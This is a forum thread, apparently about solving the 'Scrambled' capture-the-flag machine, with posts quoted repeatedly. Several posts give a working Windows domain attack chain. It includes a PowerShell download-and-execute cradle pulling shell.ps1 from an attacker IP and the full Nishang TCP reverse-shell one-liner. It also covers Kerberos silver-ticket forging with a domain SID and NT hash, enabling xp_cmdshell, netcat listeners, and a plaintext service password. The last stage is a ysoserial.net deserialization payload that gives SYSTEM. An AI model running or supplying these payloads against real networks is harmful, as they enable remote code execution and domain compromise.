(June 13, 2022, 04:42 PM)Toto Wrote:

(June 13, 2022, 04:33 PM)buggy Wrote:

(June 13, 2022, 04:30 PM)hacker1111 Wrote:

(June 13, 2022, 04:26 PM)buggy Wrote:

(June 13, 2022, 04:11 PM)hacker1111 Wrote:

$pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $pass)
Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString("http://10.10.x.x/shell.ps1") } -Credential $cred 

whats the shell.ps1?

cat /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1

#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
#$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} 

uncomment first payload and add ur IP

i have to manually run the ps1?

Nah the command runs it for you.

I saw a lot of people talking about the stuff on port 4411, is that the root part ? I finally managed to get my hand on the user flag and was wondering if the privesc was from within the shell or if I had to go back to 4411.

The ScrambleSever on port 4411 is the way to go
Get the .dll from the smb IT share and run strings against it to find command for the ScrambleSever on port 4411
Root part involves serialization/deserialization whithin the application

---

(June 13, 2022, 05:03 PM)infosecsy19 Wrote: anyone help please

how can  I get the domain SID

:::::::::::::::::::::::::::::::::::::::::::------(((((((((((((((((((((((((((

 I second this question on how @jon01 was able to get the domain sid for the impacket-ticketer

(June 13, 2022, 05:38 PM)langetmama11 Wrote:

(June 13, 2022, 04:42 PM)Toto Wrote:

(June 13, 2022, 04:33 PM)buggy Wrote:

(June 13, 2022, 04:30 PM)hacker1111 Wrote:

(June 13, 2022, 04:26 PM)buggy Wrote: whats the shell.ps1?

cat /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1

#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
#$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} 

uncomment first payload and add ur IP

i have to manually run the ps1?

Nah the command runs it for you.

I saw a lot of people talking about the stuff on port 4411, is that the root part ? I finally managed to get my hand on the user flag and was wondering if the privesc was from within the shell or if I had to go back to 4411.

The ScrambleSever on port 4411 is the way to go
Get the .dll from the smb IT share and run strings against it to find command for the ScrambleSever on port 4411
Root part involves serialization/deserialization whithin the application

I remember trying to use smbclient but it returned a "non supported error", was this something you encountered as well ?

In short for the userCreate a ticket to login to mysql, then enable xp_cmdshell[code]ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local[/code][code]export KRB5CCNAME=Administrator.ccache[/code][code]mssqlclient.py dc1.scrm.local -k[/code][code]enable_xp_cmdshell[/code]Create a payload at https://www.revshells.com/ with powershell #3 (base64)Listen with netcat (I used rlwrap for more convenience)[code]sudo rlwrap netcat -lvnp 443[/code]In mysql with xp_cmd shell send the payload, you will receive the shell in netcat[code]xp_cmdshell [/code]Use MiscSvc credentials[code]$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force[/code][code]$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)[/code]Listen again with netcat[code]sudo rlwrap netcat -lvnp 443[/code]send reverse shell using payload created above in https://www.revshells.com/[code]Invoke-Command -Computer dc1 -ScriptBlock { } -Credential $Cred[/code]In netcat listener you will receive shell now as MiscSvc

but what about root i cant seem to find anything with the dll and exe

[quote="GatoGamer1155" pid="96670" dateline="1655145182"]In short for the userCreate a ticket to login to mysql, then enable xp_cmdshell[code]ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local[/code][code]export KRB5CCNAME=Administrator.ccache[/code][code]mssqlclient.py dc1.scrm.local -k[/code][code]enable_xp_cmdshell[/code]Create a payload at https://www.revshells.com/ with powershell #3 (base64)Listen with netcat (I used rlwrap for more convenience)[code]sudo rlwrap netcat -lvnp 443[/code]In mysql with xp_cmd shell send the payload, you will receive the shell in netcat[code]xp_cmdshell [/code]Use MiscSvc credentials[code]$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force[/code][code]$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)[/code]Listen again with netcat[code]sudo rlwrap netcat -lvnp 443[/code]send reverse shell using payload created above in https://www.revshells.com/[code]Invoke-Command -Computer dc1 -ScriptBlock { } -Credential $Cred[/code]In netcat listener you will receive shell now as MiscSvc[/quote]How did you manage to pull off the domain sid?

[quote="langetmama11" pid="96716" dateline="1655150175"][quote="GatoGamer1155" pid="96670" dateline="1655145182"]In short for the userCreate a ticket to login to mysql, then enable xp_cmdshell[code]ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local[/code][code]export KRB5CCNAME=Administrator.ccache[/code][code]mssqlclient.py dc1.scrm.local -k[/code][code]enable_xp_cmdshell[/code]Create a payload at https://www.revshells.com/ with powershell #3 (base64)Listen with netcat (I used rlwrap for more convenience)[code]sudo rlwrap netcat -lvnp 443[/code]In mysql with xp_cmd shell send the payload, you will receive the shell in netcat[code]xp_cmdshell [/code]Use MiscSvc credentials[code]$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force[/code][code]$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)[/code]Listen again with netcat[code]sudo rlwrap netcat -lvnp 443[/code]send reverse shell using payload created above in https://www.revshells.com/[code]Invoke-Command -Computer dc1 -ScriptBlock { } -Credential $Cred[/code]In netcat listener you will receive shell now as MiscSvc[/quote]How did you manage to pull off the domain sid?[/quote]Im stucked in the domain SID too, should i request a ST? or with a TGT of sqlsvc im ok?

need a nudge for root how to login into the .exe

[quote="Toto" pid="96647" dateline="1655143320"][quote="langetmama11" pid="96631" dateline="1655141885"][quote="Toto" pid="96588" dateline="1655138548"][quote="buggy" pid="96581" dateline="1655138010"][quote="hacker1111" pid="96578" dateline="1655137830"][code]cat /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1#A simple and small reverse shell. Options and help removed to save space. #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.#$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} [/code]uncomment first payload and add ur IP[/quote]i have to manually run the ps1?[/quote]Nah the command runs it for you.I saw a lot of people talking about the stuff on port 4411, is that the root part ? I finally managed to get my hand on the user flag and was wondering if the privesc was from within the shell or if I had to go back to 4411.[/quote]The ScrambleSever on port 4411 is the way to goGet the .dll from the smb IT share and run strings against it to find command for the ScrambleSever on port 4411Root part involves serialization/deserialization whithin the application[/quote]I remember trying to use smbclient but it returned a "non supported error", was this something you encountered as well ?[/quote]I did yes.I had to do a workaround to get access to the share via impacket-smbclient[code]impacket-getTGT scrm.local/miscsvc:ScrambledEggs9900 -dc-ip 10.129.xx.xx -no-pass -kexport KRB5CCNAME=//miscsvc.ccacheimpacket-smbclient scrm.local/[email protected] -k -no-pass[/code]

Can anyone managed to get administrator the intended way, explain how?

Nvm, I figured it out.

Create a payload using ysoserial.net like:

ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "<command>"

Connect to port 4411.

Send it like:

UPLOAD_ORDER;<payload>

And you have rce as nt authority\system.

Can someone help with how to locate the domain SID? I've tried every tool I could think of. lookupsid, rpcclient, ldap. None of them work. Am I doing something wrong?